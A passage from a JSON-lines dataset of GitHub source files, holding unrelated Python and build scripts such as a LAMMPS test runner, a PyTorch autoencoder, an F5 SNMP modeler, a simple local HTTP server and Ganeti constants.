\"OMP_NUM_THREADS=\"+str(nthreads)]\n elif LAMMPS_MPI_MODE == \"mpich\":\n mpi_options += [\"-env\", \"OMP_NUM_THREADS\", str(nthreads)]\n\n class_name = type(self).__name__\n full_test_name = f\"{class_name}_{test_name}\"\n outfile_path = os.path.join(working_dir, f\"{full_test_name}_stdout.log\")\n errfile_path = os.path.join(working_dir, f\"{full_test_name}_stderr.log\")\n\n start_time = datetime.now()\n\n full_command = mpi_options + exe + lammps_options\n print(\" \".join(full_command))\n\n with open(outfile_path, \"w+\") as outfile, open(errfile_path, \"w+\") as errfile:\n retcode = call(full_command, cwd=working_dir, stdout=outfile, stderr=errfile)\n\n end_time = datetime.now()\n duration = end_time - start_time\n\n print(f\"Completed in: {duration.total_seconds()} seconds\")\n\n # output for JUnit attachment plugin\n print(f\"[[ATTACHMENT|{outfile_path}]]\")\n print(f\"[[ATTACHMENT|{errfile_path}]]\")\n\n return retcode\n\n\nclass LAMMPSRegressionTestCase:\n def run_regression(self, script_name, test_name):\n cmd = f'lammps_run_regression_test -v -j -g {LAMMPS_BINARY} {script_name}'\n cmd = shlex.split(cmd)\n\n p = Popen(cmd, stdout=PIPE, stderr=PIPE)\n output, error = p.communicate()\n rc = p.returncode\n\n print(output.decode('utf-8'), file=sys.stdout)\n print(error.decode('utf-8'), file=sys.stderr)\n\n return rc\n\ndef SkipTest(cls, func_name, reason):\n \"\"\" utility function to skip a specific test for a reason \"\"\"\n setattr(cls, func_name, unittest.skip(reason)(getattr(cls, func_name)))\n","repo_name":"lammps/lammps-testing","sub_path":"lammps_testing/testrunner.py","file_name":"testrunner.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"83870639","text":"import json\nimport os\n\nimport pytest\nimport yatest.common\n\nfrom crypta.lib.python import (\n templater,\n time_utils,\n yaml_config,\n)\nfrom crypta.lib.python.logbroker.test_helpers import consumer_utils\nfrom crypta.lib.python.yt.test_helpers import (\n files,\n tables,\n tests,\n)\nfrom crypta.lookalike.lib.python import test_utils\nfrom crypta.lookalike.proto.mode_pb2 import ModeValue\nfrom crypta.lookalike.proto.yt_node_names_pb2 import TYtNodeNames\nfrom crypta.lookalike.services.segment_dssm_applier.proto.config_pb2 import TConfig\n\n\nVERSION = \"1584085850\"\n\nYT_NODE_NAMES = TYtNodeNames()\n\nMAPPING_LOCAL_PATH = \"./mapping.json\"\n\n\ndef get_config_file(yt_stuff, logbroker_port, mode):\n config_file_path = yatest.common.test_output_path(\"config.yaml\")\n\n templater.render_file(\n yatest.common.source_path(\"crypta/lookalike/services/segment_dssm_applier/bundle/config.yaml\"),\n config_file_path,\n {\n \"environment\": \"qa\",\n \"yt_proxy\": yt_stuff.get_server(),\n \"lb_url\": \"localhost\",\n \"lb_topic\": \"default-topic\",\n \"lb_port\": logbroker_port,\n \"scope\": \"direct\",\n \"input_table\": \"//home/crypta/qa/direct\",\n \"mode\": mode,\n },\n )\n\n return config_file_path\n\n\ndef get_versioned_path(config, node):\n return os.path.join(config.VersionsDir, VERSION, node)\n\n\ndef get_output_tables(config, mode):\n output_tables = [(\n tables.YsonTable(\n \"errors.yson\",\n os.path.join(config.ErrorsDir, VERSION),\n yson_format=\"pretty\"\n ),\n [tests.IsAbsent()],\n )]\n\n if mode == ModeValue.ALL:\n output_tables = [\n (\n tables.YsonTable(\n \"segment_embeddings.yson\",\n get_versioned_path(config, YT_NODE_NAMES.SegmentEmbeddingsTable),\n yson_format=\"pretty\",\n on_read=test_utils.embeddings_on_read()\n ),\n [tests.Diff()],\n ),\n (\n tables.YsonTable(\n \"segment_metas.yson\",\n get_versioned_path(config, YT_NODE_NAMES.SegmentMetasTable),\n yson_format=\"pretty\"\n ),\n [tests.Diff()],\n ),\n ]\n elif mode == ModeValue.NEW:\n output_tables = [\n (\n tables.YsonTable(\n \"fresh_segment_embeddings.yson\",\n os.path.join(get_versioned_path(config, YT_NODE_NAMES.FreshSegmentEmbeddingsDir), VERSION),\n yson_format=\"pretty\",\n on_read=test_utils.embeddings_on_read()\n ),\n [tests.Diff()],\n ),\n (\n tables.YsonTable(\n \"fresh_segment_metas.yson\",\n os.path.join(get_versioned_path(config, YT_NODE_NAMES.FreshMetasDir), VERSION),\n yson_format=\"pretty\"\n ),\n [tests.Diff()],\n ),\n ]\n return output_tables\n\n\n@pytest.mark.parametrize(\"mode\", [\n pytest.param(ModeValue.NEW, id=\"new\"),\n pytest.param(ModeValue.ALL, id=\"all\"),\n])\ndef test_basic(yt_stuff, consumer, logbroker_port, mode):\n config_file = get_config_file(yt_stuff, logbroker_port, mode)\n config = yaml_config.parse_config(TConfig, config_file)\n\n results = tests.yt_test(\n yt_client=yt_stuff.get_yt_client(),\n binary=yatest.common.binary_path(\"crypta/lookalike/services/segment_dssm_applier/bin/crypta-lookalike-segment-dssm-applier\"),\n args=[\n \"--config\", config_file\n ],\n data_path=yatest.common.test_source_path(\"data\"),\n input_tables=[\n (tables.YsonTable(\"lals.yson\", config.LalsTable, on_write=test_utils.lals_on_write()), tests.TableIsNotChanged()),\n (files.YtFile(yatest.common.work_path(\"dssm_lal_model.applier\"), get_versioned_path(config, YT_NODE_NAMES.DssmModelFile), on_write=files.OnWrite()), tests.Exists()),\n (files.YtFile(yatest.common.work_path(\"segments_dict\"), get_versioned_path(config, YT_NODE_NAMES.SegmentsDictFile), on_write=files.OnWrite()), tests.Exists()),\n ],\n output_tables=get_output_tables(config, mode),\n env={\"YT_TOKEN\": \"FAKE\", time_utils.CRYPTA_FROZEN_TIME_ENV: VERSION, \"MAPPING_LOCAL_PATH\": MAPPING_LOCAL_PATH},\n )\n\n with open(MAPPING_LOCAL_PATH, \"r\") as file:\n mapping = json.load(file)\n\n for key in mapping:\n mapping[key] = sorted(mapping[key])\n os.remove(MAPPING_LOCAL_PATH)\n\n return {\n \"yt_results\": results,\n \"data_written\": sorted(consumer_utils.read_all(consumer, timeout=30)),\n \"mapping\": mapping,\n }\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test/main (54).py","file_name":"main (54).py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7707026664","text":"#calculation1.py\n#Calculation Series 1\n'''\nAuthor: Bikrant Karki\nTask:curtain size and the cost calculation\n 1. Take the input of current rate per meter\n 2. Take the Input is the curtain for Door or Window?\n 3. Take the input of Length and breadth for the curtain\n 4. Print the total area of curtain size\n 5. Calculate the Total cost =area x current rate\n 6. Print the Total Cost for Cutain of Door or window \n \nTarget user: Who want to learn Python\nTarget System:GNU/Linux\nInterface:command line\nFunctional Requirement: \nTesting: Simple Run Test|| python3\nMaintainer: bikrantkarki.com.np|| bikrant7@gmail.com\n'''\n\n#Set the variables\ncurtain=\"\"\n#length= float\n#breadth= float\n#rate = float\ncost = float\narea = float\nmore= \"\"\ndivider =\"--------------**********------------------\"\n#prompt for user-defined information\n\nrate = input(\"enter the current market rate for the curtain per meter:\")\ncurtain= input(\"You are lokking curtain for Door or window?:\")\nlength = input (\"enter the Length for your curtain in meter:\")\nbreadth= input (\"enter the breadth for your curtain in meter:\")\n\n#Calculate according to the information\nlength= float(length) #should convert the input and define the type\nbreadth= float(breadth)\nrate = float(rate)\n\narea = length*breadth;\nprint(\"The toal area for\", curtain, \"is\", area ,\"square meter\")\ncost= rate * area;\nprint(\"The Total cost for the\", curtain, \"is\",\"Rs.\", cost)\n\nprint(divider)\nprint(\"\\t Total Area \\t\\t Total Cost \\t Location\")\nprint(\"\\t\",area, \"sqm\" ,\"\\t\\t\", \"Rs.\",cost, \"\\t\", curtain)\nprint(divider)\n\n'''\nOutput:\n\nenter the current market rate for the curtain per meter:250\nYou are lokking curtain for Door or window?:front hall door\nenter the Length for your curtain in meter:1.5\nenter the breadth for your curtain in meter:3.5\nThe toal area for front hall door is 5.25 square meter\nThe Total cost for the front hall door is Rs. 1312.5\n--------------**********------------------\n\t Total Area \t\t Total Cost \t Location\n\t 5.25 sqm \t\t Rs. 1312.5 \t front hall door\n--------------**********------------------\n\n'''\n","repo_name":"bikrantkarki/Python3_training","sub_path":"calculation1.py","file_name":"calculation1.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8449262229","text":"env = Environment()\n\nlibs = Split(\"vmap fig options utils 2d\")\n\nenv.Append (CCFLAGS=['-O2'])\nenv.Append (CPPPATH = [\"../../core\"])\nenv.Append (LIBPATH = list(map(lambda s: \"../../core/\"+s, libs)) )\nenv.Append (LIBPATH = [\".\"] )\nenv.Prepend(LIBS=libs)\n\nenv.Program(['fig_old2new.cpp','zn_key.cpp'])\n\n","repo_name":"ushakov/mapsoft","sub_path":"vector/compat/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"72130340714","text":"# ! change LOCAL to False before submitting !\n# set LOCAL to True for local testing\n\nLOCAL = False\n\nif LOCAL:\n class DoubleConnectedNode: \n def __init__(self, value, next=None, prev=None): \n self.value = value \n self.next = next \n self.prev = prev\n\ndef solution(node):\n n = node # Первый элемент\n m = node.next # Второй элемент\n n.next = None # следущий элемент будет равен 0, т.е. начало стало концом\n n.prev = m # Второй элемент стал вторым с конца\n while m is not None:\n m.prev = m.next\n m.next = n\n n = m\n m = m.prev\n node = n \n return node\n\ndef test():\n node3 = DoubleConnectedNode(\"node3\")\n node2 = DoubleConnectedNode(\"node2\")\n node1 = DoubleConnectedNode(\"node1\")\n node0 = DoubleConnectedNode(\"node0\")\n\n node0.next = node1\n\n node1.prev = node0\n node1.next = node2\n\n node2.prev = node1\n node2.next = node3\n\n node3.prev = node2\n new_head = solution(node0)\n assert new_head is node3\n assert node3.next is node2\n assert node2.next is node1 \n assert node2.prev is node3\n assert node1.next is node0 \n assert node1.prev is node2\n assert node0.prev is node1\n\nif __name__ == '__main__':\n test()","repo_name":"Vandomar/algorithm-and-data-","sub_path":"Data/Двусвязнй/double.py","file_name":"double.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25237834770","text":"import torch\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\n# 超参数\nbatch_size = 256\nlearning_rate = 0.001\nnum_epochs = 200\n\n# 数据处理\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n])\n\n# 加载 MNIST 数据集\ntrain_dataset = torchvision.datasets.MNIST(root='data', train=True, transform=transform, download=True)\ntrain_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\n\n\n# 堆叠自编码器模型\nclass StackedAutoencoder(nn.Module):\n def __init__(self):\n super(StackedAutoencoder, self).__init__()\n self.encoder = nn.Sequential(\n nn.Linear(28 * 28, 128),\n nn.ReLU(),\n nn.Linear(128, 64),\n nn.ReLU(),\n nn.Linear(64, 12)\n )\n self.decoder = nn.Sequential(\n nn.Linear(12, 64),\n nn.ReLU(),\n nn.Linear(64, 128),\n nn.ReLU(),\n nn.Linear(128, 28 * 28),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n encoded = self.encoder(x)\n decoded = self.decoder(encoded)\n return decoded\n\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = StackedAutoencoder().to(device)\n\n# 损失函数和优化器\ncriterion = nn.MSELoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\nwriter = SummaryWriter(\"runs/stack_log\")\n\nstep = 2\n# 训练模型\nfor epoch in range(num_epochs):\n running_loss = 0.0\n for i, (images, _) in enumerate(train_loader):\n images = images.view(images.size(0), -1).to(device)\n\n # 前向传播\n outputs = model(images)\n loss = criterion(outputs, images)\n running_loss += loss.item()\n # 反向传播\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # if (i + 1) % 100 == 0:\n # print(f'Epoch [{epoch + 1}/{num_epochs}], Step [{i + 1}/{len(train_loader)}], Loss: {loss.item():.4f}')\n if epoch == step:\n writer.add_image(f\"imgae_{step}\", images[23].view(1, 28, 28), step)\n writer.add_image(f\"output_image_{step}\", outputs[23].view(1, 28, 28), step)\n step = step * 2\n writer.add_scalar(\"Loss_epoch/train\", running_loss / i, epoch + 1)\n print(f'Epoch [{epoch + 1}/{num_epochs}], Loss: {loss.item():.4f}')\nwriter.close()\nprint('Training completed.')\n","repo_name":"codezzzsleep/self-supervised","sub_path":"AutoEncoder/stackAE.py","file_name":"stackAE.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40978418095","text":"import os\nimport argparse\n\nfrom tqdm import tqdm\n\nfrom char_stylist import CharStylist\nfrom utility import char2code, pathstr, save_images, save_single_image\n\nimport numpy as np\nimport torch\n\n\ndef main(\n save_path,\n stable_diffusion_path,\n \n sheet_type,\n writers,\n \n device,\n):\n char_stylist = CharStylist.load(\n save_path,\n stable_diffusion_path,\n \n device,\n )\n \n if sheet_type == \"hiragana\":\n nrow = 11\n chars = [\n \"あ\", \"い\", \"う\", \"え\", \"お\",\n \"か\", \"き\", \"く\", \"け\", \"こ\",\n \"さ\", \"し\", \"す\", \"せ\", \"そ\",\n \"た\", \"ち\", \"つ\", \"て\", \"と\",\n \"な\", \"に\", \"ぬ\", \"ね\", \"の\",\n \"は\", \"ひ\", \"ふ\", \"へ\", \"ほ\",\n \"ま\", \"み\", \"む\", \"め\", \"も\",\n \"や\", None, \"ゆ\", None, \"よ\",\n \"ら\", \"り\", \"る\", \"れ\", \"ろ\",\n \"わ\", \"ゐ\", None, \"ゑ\", \"を\",\n \"ん\", None, None, None, None,\n ]\n chars = [chars[(11 - (i % 11 + 1)) * 5 + (i // 11)] for i in range(len(chars))]\n \n elif sheet_type == \"katakana\":\n nrow = 11\n chars = [\n \"ア\", \"イ\", \"ウ\", \"エ\", \"オ\",\n \"カ\", \"キ\", \"ク\", \"ケ\", \"コ\",\n \"サ\", \"シ\", \"ス\", \"セ\", \"ソ\",\n \"タ\", \"チ\", \"ツ\", \"テ\", \"ト\",\n \"ナ\", \"ニ\", \"ヌ\", \"ネ\", \"ノ\",\n \"ハ\", \"ヒ\", \"フ\", \"ヘ\", \"ホ\",\n \"マ\", \"ミ\", \"ム\", \"メ\", \"モ\",\n \"ヤ\", None, \"ユ\", None, \"ヨ\",\n \"ラ\", \"リ\", \"ル\", \"レ\", \"ロ\",\n \"ワ\", \"ヰ\", None, \"ヱ\", \"ヲ\",\n \"ン\", None, None, None, None,\n ]\n chars = [chars[(11 - (i % 11 + 1)) * 5 + (i // 11)] for i in range(len(chars))]\n \n else:\n raise Exception(f\"unknown sheet_type: {sheet_type}\")\n \n for char in chars:\n if char is None:\n continue\n if char not in char_stylist.char2idx:\n raise Exception(f\"unknown character: {char}\")\n \n for writer in writers:\n if writer not in char_stylist.writer2idx:\n raise Exception(f\"unknown writer: {writer}\")\n \n # sampling\n images_list = []\n for char in tqdm(chars):\n if char is None:\n images_list.append(torch.zeros((len(writers), 3, 64, 64)))\n else:\n images_list.append(char_stylist.sampling(char, writers))\n \n for i, writer in enumerate(writers):\n image_path = os.path.join(save_path, \"generated\", f\"sheet_{sheet_type} writer={writer}.jpg\")\n save_images([images[i] for images in images_list], image_path, nrow=nrow)\n \n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n \n parser.add_argument(\"--save_path\", type=pathstr, default=pathstr(\"./datadisk/save_path/test ETL4,ETL5\"))\n parser.add_argument(\"--stable_diffusion_path\", type=pathstr, default=pathstr(\"~/datadisk/stable-diffusion-v1-5\"))\n \n parser.add_argument(\"--sheet_type\", type=str, default=\"hiragana\")\n parser.add_argument(\"--writers\", type=str, nargs=\"*\",\n default=([f\"ETL4_{i}\" for i in range(5001, 5016 + 1)] + [f\"ETL5_{i}\" for i in range(6001, 6016 + 1)]))\n \n parser.add_argument(\"--device\", type=str, default=\"cuda:0\")\n \n args = parser.parse_args()\n \n # todo: validation\n \n main(\n args.save_path,\n args.stable_diffusion_path,\n \n args.sheet_type,\n args.writers,\n \n args.device,\n )\n","repo_name":"yawarakacream/CharStylist","sub_path":"sheet_sampling.py","file_name":"sheet_sampling.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38580654498","text":"\"\"\"\nGather F5 LTM Virtual Server Information\n\n@author: David Petzel\n@contact: david.petzel@disney.com\n@date: 05/06/2011\n\n\"\"\"\n\nfrom Products.DataCollector.plugins.CollectorPlugin import SnmpPlugin, GetTableMap, GetMap\nfrom Products.DataCollector.plugins.DataMaps import ObjectMap\nimport re\nimport binascii\nimport string\nimport socket\nfrom pprint import pprint\n\nclass BigipLtmVirtualServerMap(SnmpPlugin):\n \"\"\"\n Handles the modeling of Virtual Servers on the LTM\n \n Custom Properties Added:\n zVirtualServerNameFilter - This will provide a list of regex strings to compare\n the virtual server name against. Only items that match will be returned.\n When left blank all virtual servers will be returned\n \n \"\"\"\n relname = \"LtmVs\"\n modname = \"ZenPacks.community.f5.BigipVirtualServer\"\n deviceProperties = SnmpPlugin.deviceProperties + ('zF5BigipVirtualServerNameFilter',)\n \n # Column dictionaries represent the OID ending for the data point your interested in.\n # This value gets appended to the base issue listed in the snmpGetTableMaps call\n basecolumns = {\n '.1.1': 'ltmVirtualServName',\n '.1.3': 'ltmVirtualServAddr',\n '.1.6': 'ltmVirtualServPort',\n }\n # The VIP Status is provided from a separate table\n status_columns = {\n '.1.1': 'ltmVsStatusName',\n '.1.2': 'ltmVsStatusAvailState',\n '.1.3': 'ltmVsStatusEnabledState',\n '.1.5': 'ltmVsStatusDetailReason', \n }\n \n \n snmpGetTableMaps = (\n #Virtual Server Table\n GetTableMap('ltmVirtualServTable', '.1.3.6.1.4.1.3375.2.2.10.1.2', basecolumns),\n GetTableMap('ltmVsStatusTable', '.1.3.6.1.4.1.3375.2.2.10.13.2', status_columns)\n )\n\n \n \n def process(self, device, results, log):\n \"\"\"\n Just as it sounds\n \"\"\"\n #The availability of the specified virtual server indicated in color.\n #none - error;\n #green - available in some capacity;\n #yellow - not currently available;\n #red - not available;\n #blue - availability is unknown;\n #gray - unlicensed.\n avail_status_values = {\n 0: 'None - Error',\n 1: 'Green - available in some capacity',\n 2: 'Yellow - not currently available',\n 3: 'Red - not available',\n 4: 'Blue - availability is unknown',\n 5: 'Gray - unlicensed',\n }\n \n \n #The activity status of the specified virtual server, as specified \n #by the user.\n enable_state_values = {\n 1: 'Enabled',\n 2: 'Disabled'\n }\n \n log.info('processing %s for device %s', self.name(), device.id)\n getdata, tabledata = results\n \n vs_table = tabledata.get(\"ltmVirtualServTable\")\n \n # Grab the second table and append it to the first\n status_table = tabledata.get(\"ltmVsStatusTable\")\n for oid, data in status_table.items():\n for key, value in data.items():\n if key not in vs_table[oid]:\n vs_table[oid][key] = value\n \n maps = []\n rm = self.relMap()\n # Get the list of name patterns to search for\n VirtualServerNameFilter = getattr(device, 'zF5BigipVirtualServerNameFilter', None)\n log.debug(\"Picked up Filter List of: %s\" , VirtualServerNameFilter)\n for oid, data in vs_table.items():\n # log.debug(\"%s : %s\\n\", oid, data)\n #\n om = self.objectMap(data)\n include_vs = True\n if VirtualServerNameFilter != None and VirtualServerNameFilter != \"\":\n # If there is a regex filter supplied, lets use it\n if re.search(VirtualServerNameFilter, om.ltmVirtualServName) == None:\n include_vs = False\n if include_vs == True:\n om.id = self.prepId(om.ltmVirtualServName)\n om.snmpindex = oid\n # The value fetched is a packed hex representation of the IP\n # Use socket to convert to octet based IP\n # http://docs.python.org/library/socket.html#socket.inet_ntoa\n om.vsIP = socket.inet_ntoa(om.ltmVirtualServAddr)\n #print om.status\n if om.ltmVsStatusAvailState == 1:\n om.status = \"Up\"\n else:\n om.status = \"Down\"\n \n om.VsStatusEnabledState = enable_state_values[om.ltmVsStatusEnabledState]\n om.VsStatusAvailState = avail_status_values[om.ltmVsStatusAvailState]\n om.VsStatusDetailReason = om.ltmVsStatusDetailReason\n rm.append(om)\n #log.debug(rm)\n return [rm] \n \n\n\n ","repo_name":"zenoss/Community-Zenpacks","sub_path":"ZenPacks.community.f5/ZenPacks/community/f5/modeler/plugins/BigipLtmVirtualServerMap.py","file_name":"BigipLtmVirtualServerMap.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"17505101501","text":"\nfrom veem.client.veem import VeemClient\nfrom veem.client.requests.exchange_rate import ExchangeRateRequest\n\nif __name__ == '__main__':\n\n # define a VeemClient Context Manager with yaml+file and auto login.\n with VeemClient(yaml_file='/path/to/your/configuration.yaml',\n useClientCredentials=True) as veem:\n # define an ExchangeRateRequest\n request = ExchangeRateRequest(fromAmount=500.0,\n fromCurrency='CAD',\n fromCountry='CA',\n toCurrency='USD',\n toCountry='US')\n # request the fx rate\n rate = veem.exchangeRateClient.generate(request)\n","repo_name":"veeminc/veem-python-sdk","sub_path":"examples/request_fx_quote.py","file_name":"request_fx_quote.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34028071601","text":"#!/usr/bin/env python\n\"\"\"\nmth_py_httpsrvhere: Simple HTTP server to serv local dir\nv: 1.0.2\nd: 06022018\n\"\"\"\nimport sys, os\nimport time\nimport optparse\nimport SimpleHTTPServer\nimport SocketServer\n\nMKVRSN = \"1.0.2_06022018\"\nMKPROG = \"httpsrvhere\"\nMKDESC = \"meka_py_httpsrvhere: Simple HTTP server to serv local dir\"\nMKEPIL = \"a meka nekal creation with <3\"\n\nPORT = 38080\nADDR = \"0.0.0.0\"\n\nSMPLSRVR_EXT = { '.webapp': 'application/x-web-app-manifest+json', }\n\ndef prs_cmdline( ):\n prog = MKPROG\n version = \"%prog \" + MKVRSN\n description = MKDESC\n epilog = MKEPIL\n o = optparse.OptionParser(prog=prog, version=version, description=description, epilog=epilog )\n o.add_option( \"-p\", \"--port\", dest=\"LPORT\", help=\"Listen Port,\\tdef:%d\"%PORT, default=PORT, type=int ) #action=\"store_true\", default=False)\n o.add_option( \"-l\", dest=\"LADDR\", help=\"Listen Address,\\tdef:%s\"%ADDR, default=ADDR, type=str )\n #o.add_option(\"-f\",dest=\"logfn\",help=\"File to save logs\",default=\"/var/log/httpsrvhere\" )\n return o.parse_args()\n\ndef bld_url( sa, lurl = \"http://\" ):\n if sa[0]==\"\" or sa[0]==\"0.0.0.0\": lurl+=\"127.0.0.1\"\n else: lurl+=sa[0]\n if sa[1]!=80: lurl+=\":%d\"%sa[1]\n lurl+=\"/\"\n return lurl\n\ndef prep_server(options):\n Handler = SimpleHTTPServer.SimpleHTTPRequestHandler\n Handler.extensions_map.update(SMPLSRVR_EXT)\n httpd = SocketServer.TCPServer((options.LADDR, options.LPORT),Handler)\n return Handler, httpd\n\ndef main( ):\n options, args = prs_cmdline()\n lurl = \"http://\"\n print( \"[!] Server INIT...\" )\n Handler, httpd = prep_server( options )\n print( \"[!] Server STARTING !\" )\n lurl = bld_url( httpd.socket.getsockname( ) )\n print( \"[+] Serving at port %s:%d\" % ( options.LADDR, options.LPORT ) )\n print( \" \\\\__ %s\" % lurl )\n httpd.serve_forever( )\n\nif __name__ == '__main__':\n main( )\n","repo_name":"Methimpact/httpsrvhere","sub_path":"httpsrvhere.py","file_name":"httpsrvhere.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118662313","text":"MOD = 10 ** 9 + 7\n\n\nclass Solution:\n\n def __init__(self):\n self.s = ''\n self.k = 0\n self.memo = {}\n\n def numberOfArrays(self, s: str, k: int) -> int:\n self.s = s\n self.k = k\n return self.dfs(0)\n\n def dfs(self, start_idx):\n if start_idx == len(self.s):\n return 1\n if self.s[start_idx] == '0':\n return 0\n if start_idx in self.memo:\n return self.memo[start_idx]\n\n num = 0\n res = 0\n for end_idx in range(start_idx, len(self.s)):\n num = num * 10 + int(self.s[end_idx])\n if num > self.k:\n break\n res += self.dfs(end_idx + 1)\n res %= MOD\n\n self.memo[start_idx] = res\n return res\n","repo_name":"cabulous/leetcode","sub_path":"python/1416.py","file_name":"1416.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72566445674","text":"VERSION = '0.7'\nOWNER_TAG = 'gwm:owner:'\n\n# Form Constants\nEMPTY_CHOICE_FIELD = (u'', u'---------')\n\nMODE_CHOICES = (\n ('live','Live'),\n ('non-live','Non-Live'),\n)\n\nNODE_ROLE_MAP = {\n 'M':'Master',\n 'C':'Master Candidate',\n 'R':'Regular',\n 'D':'Drained',\n 'O':'Offline',\n}\n\nROLE_CHOICES = (\n EMPTY_CHOICE_FIELD,\n (u'master-candidate',u'Master Candidate'),\n (u'regular',u'Regular'),\n (u'drained',u'Drained'),\n (u'offline',u'Offline'),\n)\n\nROLE_MAP = {\n 'C':u'master-candidate',\n 'R':u'regular',\n 'D':u'drained',\n 'O':u'offline',\n}\n\n# KVM Choices\nKVM_BOOT_ORDER = [\n (u'disk', u'Hard Disk'),\n (u'cdrom', u'CD-ROM'),\n (u'network', u'Network'),\n]\n\nKVM_FLAGS = [\n EMPTY_CHOICE_FIELD,\n (u'enabled', u'Enabled'),\n (u'disabled', u'Disabled'),\n]\n\nKVM_DISK_TYPES = [\n (u'scsi', u'scsi'),\n (u'sd', u'sd'),\n (u'mtd', u'mtd'),\n (u'pflash', u'pflash'),\n]\n\nKVM_NIC_TYPES = [\n (u'i82551',u'i82551'),\n (u'i82557b',u'i82557b'),\n (u'i82559er',u'i82559er'),\n (u'pcnet',u'pcnet'),\n (u'e1000',u'e1000'),\n]\n\n# Xen HVM Choices\nHVM_BOOT_ORDER = [\n (u'cd', u'Hard Disk, CD-ROM'),\n (u'a', u'Floppy Drive'),\n (u'c', u'Hard Disk'),\n (u'd', u'CD-ROM'),\n (u'n', u'Network'),\n]\n\nHVM_DISK_TYPES = [\n (u'ioemu', u'ioemu'),\n]\n\n# HV Choices\nHV_DISK_TEMPLATES = [\n EMPTY_CHOICE_FIELD,\n (u'plain', u'plain'),\n (u'drbd', u'drbd'),\n (u'file', u'file'),\n (u'diskless', u'diskless')\n]\n\n# HV Choices\nHV_DISK_TEMPLATES_SINGLE_NODE = [\n EMPTY_CHOICE_FIELD,\n (u'plain', u'plain'),\n (u'file', u'file'),\n (u'diskless', u'diskless')\n]\n\nHV_DISK_TYPES = [\n EMPTY_CHOICE_FIELD,\n (u'paravirtual',u'paravirtual'),\n (u'ide',u'ide'),\n]\n\nHV_NIC_MODES = [\n EMPTY_CHOICE_FIELD,\n (u'routed', u'routed'),\n (u'bridged', u'bridged')\n]\n\nHV_NIC_TYPES = [\n EMPTY_CHOICE_FIELD,\n (u'rtl8139',u'rtl8139'),\n (u'ne2k_isa',u'ne2k_isa'),\n (u'ne2k_pci',u'ne2k_pci'),\n (u'paravirtual',u'paravirtual'),\n]\n\nHV_BOOT_ORDER = KVM_BOOT_ORDER\n\nHV_DISK_CACHES = [\n (u'none',u'None'),\n (u'default',u'Default'),\n (u'writethrough',u'Writethrough'),\n (u'writeback',u'Writeback'),\n]\n\nHV_SECURITY_MODELS = [\n (u'none',u'None'),\n (u'user',u'User'),\n (u'pool',u'Pool'),\n]\n\nHV_USB_MICE = [\n EMPTY_CHOICE_FIELD,\n (u'mouse',u'Mouse'),\n (u'tablet',u'Tablet'),\n]\n\nALL_DISK_TYPES = HV_DISK_TYPES + KVM_DISK_TYPES + HVM_DISK_TYPES\nALL_NIC_TYPES = HV_NIC_TYPES + KVM_NIC_TYPES\nALL_BOOT_ORDER = KVM_BOOT_ORDER + HVM_BOOT_ORDER\n\nKVM_CHOICES = {\n 'disk_type': HV_DISK_TYPES + KVM_DISK_TYPES,\n 'nic_type': HV_NIC_TYPES + KVM_NIC_TYPES,\n 'boot_order': KVM_BOOT_ORDER,\n}\n\nHVM_CHOICES = {\n 'disk_type': HV_DISK_TYPES + HVM_DISK_TYPES,\n 'nic_type': HV_NIC_TYPES,\n 'boot_order': HVM_BOOT_ORDER,\n}\n\nALL_CHOICES = {\n 'disk_type': ALL_DISK_TYPES,\n 'nic_type': ALL_NIC_TYPES,\n 'boot_order': ALL_BOOT_ORDER,\n}\n\nNO_CHOICES = {\n 'disk_type': None,\n 'nic_type': None,\n 'boot_order': None,\n}\n\n","repo_name":"bsu/GWM2","sub_path":"ganeti_web/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10511574939","text":"import media\n\n\ndef get_movie_list():\n \"\"\"\n Returns:\n A list of populated media.Movie objects\n \"\"\"\n print(\"Generating movie list...\")\n movie_list = []\n movie_list.append(media.Movie(\n title='Four Brothers',\n summary='Mark Wahlberg takes on a crime syndicate with his brothers.',\n trailer_youtube_url='https://www.youtube.com/watch?v=vZPi0K6UoP8',\n rating=5,\n imdb_id='tt0430105'))\n movie_list.append(media.Movie(\n 'American Sniper',\n imdb_id='tt2179136',\n 